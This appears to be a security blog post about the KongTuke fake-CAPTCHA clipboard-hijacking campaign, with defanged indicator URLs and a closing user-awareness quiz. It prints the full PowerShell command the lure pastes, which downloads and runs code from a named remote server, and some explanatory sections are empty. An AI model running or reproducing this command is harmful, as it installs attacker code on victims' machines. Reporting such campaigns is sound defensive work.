KongTuke: The Rise of Clipboard Hijacking Through Fake CAPTCHAs

A new cyberattack chain dubbed “KongTuke” is making headlines in the cybersecurity community for its stealthy social engineering tactics and use of fake CAPTCHA pages to hijack unsuspecting users’ clipboards. This attack, recently document by Bradley Duncan of Palo Alto Networks’ Unit 42 team, leverages legitimate but compromised websites to distribute malicious scripts, trick users, and potentially install unidentified malware on their systems.

How the KongTuke Attack Works

The attack begins subtly—through injected malicious scripts found on seemingly trustworthy websites. One example highlighted in the report is: hxxps://lancasternh[.]com/6t7y.js This script then loads a second-stage payload from: hxxps://lancasternh[.]com/js.php
Once a user visits the site, the malicious code collects device data, such as IP address, browser details, and referrer info—all encoded in Base64 to conceal its behavior.

injected script wiresark analysis

The Fake CAPTCHA Trap

The user is then redirected to a fake CAPTCHA page—designed to resemble legitimate verification systems. But unlike real CAPTCHAs that ask you to select images or check a box, this one prompts suspicious behavior like:

This technique is referred to as ClickFix CAPTCHA, a dangerous form of social engineering that manipulates users into executing malicious scripts by disguising them as routine verification steps.

What is Clipboard Hijacking (Pastejacking)?

The real danger begins once the user clicks or interacts with the fake CAPTCHA. A malicious PowerShell command is automatically copied to their clipboard—a technique called clipboard hijacking or pastejacking.
The malware then urges the user to open a Run window (Win + R) and paste the clipboard content—unknowingly executing harmful code. Here’s an example of the PowerShell payload used: powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))". This command connects to: 138.199.156[.]22:8080 From there, it retrieves additional malicious payloads tailored to the current timestamp.

fake CAPTCHAs

What Happens After Infection?

According to Unit 42’s report, after the script runs:

Yet, the final malware payload remains unknown, making the threat more dangerous because its endgame is still concealed.

C2 server

Why KongTuke Is So Dangerous

Protect Yourself from KongTuke and Similar Threats

To defend against this evolving threat, cybersecurity experts recommend the following:

The KongTuke cyberattack is a clear reminder of how advanced threat actors are exploiting human behavior and trust in web design. By using fake CAPTCHAs, clipboard hijacking, and malicious scripting, attackers manipulate users into becoming their own attack vectors.
As researchers like Bradley Duncan and platforms like Unit 42 continue to analyze this campaign, staying informed is your first line of defense.
🔒 When in doubt, don’t click. Don’t paste. Stay secure.

READ MORE BLOGS

Quiz: Kongtuke Clipboard Malware Security Safety

Take this quick quiz to evaluate your understanding on Kongtuke malware. Choose the most appropriate answer for each question.

1. You visit a website, and a CAPTCHA prompts you to copy and paste a command into the Run window. What should you do?

  • Paste the command to proceed quickly.
  • Close the site immediately and verify the website's legitimacy.
  • Ask someone for advice on executing the command.
  • Refresh the page and try again.

2. You notice that your clipboard contains a PowerShell command you didn’t copy. What action should you take next?

  • Run the command to see what it does.
  • Clear your clipboard and run a malware scan.
  • Paste it into a text file for safekeeping.
  • Ignore it and continue browsing.

3. A CAPTCHA page asks you to press certain keys or interact with your system (e.g., open the Run window). How do you react?

  • Comply with the instructions since CAPTCHAs are always safe.
  • Check if the CAPTCHA looks unusual or performs unexpected actions.
  • Save the page link for later review.
  • Continue interacting with the site to finish your task.

4. A colleague in your network reports encountering a similar fake CAPTCHA page. What steps should you recommend?

  • Suggest ignoring the issue.
  • Advise them to update their browser and report the website to your security team.
  • Ask them to replicate the steps to see if it happens again.
  • Recommend uninstalling their browser altogether.

5. Imagine you unknowingly paste a malicious command into the Run window. What should you do immediately?

  • Disconnect from the internet and run a full system malware scan
  • Restart your system and hope the issue resolves itself.
  • Contact the website admin for help.
  • Continue working unless noticeable changes occur.